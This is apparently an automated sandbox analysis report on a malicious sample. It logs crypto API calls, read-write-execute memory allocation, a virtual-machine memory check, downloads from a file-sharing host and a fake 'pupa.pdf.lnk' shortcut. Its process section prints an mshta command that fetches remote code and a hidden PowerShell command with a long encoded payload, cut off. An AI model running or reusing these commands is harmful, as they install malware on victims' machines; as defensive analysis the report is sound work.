CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fe270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004feab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004feab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004feab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 2, 2025, 8:52 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (2 events)

request	GET https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77
request	GET https://dc438.4sync.com/download/gPp9O6FS/pupa.html?dsid=LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77&sbsr=b53cf2d6dee9ce9b8ba3d0c01f4b8732b47&bip=MTIxLjEzMy4xMjguMQ&lgfp=40

Allocates read-write-execute memory (usually to unpack itself) (50 out of 153 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0281a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02812000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02822000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0284a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02823000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02824000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0286b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02867000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0281b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02842000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02865000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02825000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0284c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02826000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0286c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02843000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02844000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02845000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02846000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02847000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02848000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02849000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cf1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cf2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cf3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cf4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cf5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cf6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cf7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cf8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cf9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cfa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cfb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cfc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cfd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cfe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\pupa.pdf.lnk

Creates a suspicious process (6 events)

cmdline	mshta https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77
cmdline	powershell.exe -w h -nop -ep un -E JABhAHEAVgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcANwA0ADcANwA3ADIAOAAyADQANwAzADUAOQA3ADAAMgBDADIAMAAyADQANQA5ADYARgA0AEMAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAzADUAOQA3ADAAMgAwADIANAA1ADkANgBGADQAQwAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAMAA2ADYANQA2ADIAOAAyADQANwAzADUAOQA3ADAAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAzADUAOQA3ADAAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA3ADQANgA1ADcAMgA4ADIANAA2ADEANwAxADUANgAyADkANwBCADIANAA2ADIANQA0ADQAMQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2ADUANgBEADYAQgAyADAANAAwADIAOAAzADEAMwAyADMAMgAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwAzADMAMQAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwAxADMAMQAyAEMAMwAxADMANQAzADIAMgBDADMAMQAzADQAMwA5ADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANQAzADQAMgBDADMAMQAzADYAMwAwADIAOQAyADkAMwBCADIANAA1ADkANgBGADQAQwAyADAAMwBEADIAMAAyADQANgAyADUANAA0ADEAMgBFADQANAA2AEYANwA3ADYARQA2AEMANgBGADYAMQA2ADQANAA0ADYAMQA3ADQANgAxADIAOAAyADQANgAxADcAMQA1ADYAMgA5ADMAQgA3ADIANgA1ADcANAA3ADUANwAyADYARQAyADAAMgA0ADUAOQA2AEYANABDADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA1ADYARAA2AEIAMgA4ADIANAA0ADEANQA2ADYAQgAyADkANwBCADIAOAAyADQANAAxADUANgA2AEIAMgAwADcAQwAyADUANwBCADIAMAA1AEIANgAzADYAOAA2ADEANwAyADUARAAyADgAMgA0ADUARgAyADAAMgBEADIAMAAzADQAMwA0ADIAOQAyADAANwBEADIAOQAyADAAMgBEADYAQQA2AEYANgA5ADYARQAyADAAMgA3ADIANwA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYANwA2ADIANQA4ADIAOAAyADkANwBCADIANAA0ADcANQA4ADcAMwAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAyADAAMgBCADIAMAAyADcANQBDADIANwAzAEIAMgA0ADcAOQA2ADYANgBDADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA0ADEANwAwADcAMAA0ADQANgAxADcANAA2ADEAMwBCADIANAA0ADgANgBCADYAQQAyADAAMwBEADIAMAAyADQANwA5ADYANgA2AEMAMgAwADIAQgAyADAAMgA3ADUAQwA3ADMANgAxADYARAA3ADAANgBDADYANQAyAEUANwAwADYANAA2ADYAMgA3ADMAQgA0ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAOAA2AEIANgBBADIAOQA3AEIANgA5ADYAOQAyADAAMgA0ADQAOAA2AEIANgBBADMAQgA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADAAMgA0ADcAOAA3AEEANQA5ADIAMAAzAEQAMgAwADYANwA0ADYANQA3ADIAMAAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMANQAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwA1ADMAMAAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA2ADMAMAAyAEMAMwA5ADMAMAAyAEMAMwAxADMANAAzADMAMgBDADMAMQAzADUAMwA1ADIAQwAzADEAMwA1ADMAMwAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADQAMwAxADIAQwAzADEAMwA1ADMAMwAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwAyADIAQwAzADEAMwA0ADMANQAyAEMAMwA5ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyADkAMgA5ADMAQgA3ADcANAA3ADcANwAyADAAMgA0ADQAOAA2AEIANgBBADIAMAAyADQANwA4ADcAQQA1ADkAMwBCADYAOQA2ADkAMgAwADIANAA0ADgANgBCADYAQQAzAEIANwBEADMAQgAzAEIAMwBCADIANAA0AEIANAA4ADYAMwA1ADkANAAzADYARQA1ADUANQA4ADcAOQA2ADkANQAyADUAQQA2AEEANABBADIAMAAzAEQAMgAwADIANAA0ADcANQA4ADcAMwAyADAAMgBCADIAMAAyADcANwA0ADcANAAyAEUANgA1ADcAOAA2ADUAMgA3ADMAQgA2ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEAMgA5ADcAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADQANQA2AEMANwAzADYANQA3AEIAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMARAA2ADcANAA2ADUANwAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADMAMgBDADMAMQAzADYAMwAzADIAQwAzADEAMwA2ADMAMwAyAEMAMwA5ADMAMAAyAEMAMwA5ADMANgAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADYAMwA1ADIAQwAzADEAMwA1ADMANAAyAEMAMwAxADMANAAzADMAMgBDADMAOQAzADAAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA1ADMANQAyAEMAMwAxADMANQAzADMAMgBDADMAOQAzADEAMgBDADMAMQAzADUAMwA5ADIAQwAzADkAMwAxADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMAMwAzADkAMgBDADMAMQAzADYAMwAxADIAQwAzADgAMwA5ADIAQwAzADkAMwA5ADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMAMgAzADEAMgBDADMAMQAzADUAMwA2ADIAQwAzADEAMwAyADMAMgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADAAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANgAzADQAMgBDADMAMQAzADQAMwA1ADIAOQAyADkAMwBCADcANwA0ADcANwA3ADIAMAAyADQANABCADQAOAA2ADMANQA5ADQAMwA2AEUANQA1ADUAOAA3ADkANgA5ADUAMgA1AEEANgBBADQAQQAyADAAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADMAQgAzAEIAMwBCADcARAA2ADcANgAyADUAOAAzAEIAJwA7ACQAYgBUAEEAPQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABhAHEAVgAuAEwAZQBuAGcAdABoADsAJABpACsAPQAyACkAewAkAGIAVABBACsAPQBbAGMAaABhAHIAXQAoAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8ASQBuAHQAMwAyACgAJABhAHEAVgAuAFMAdQBiAH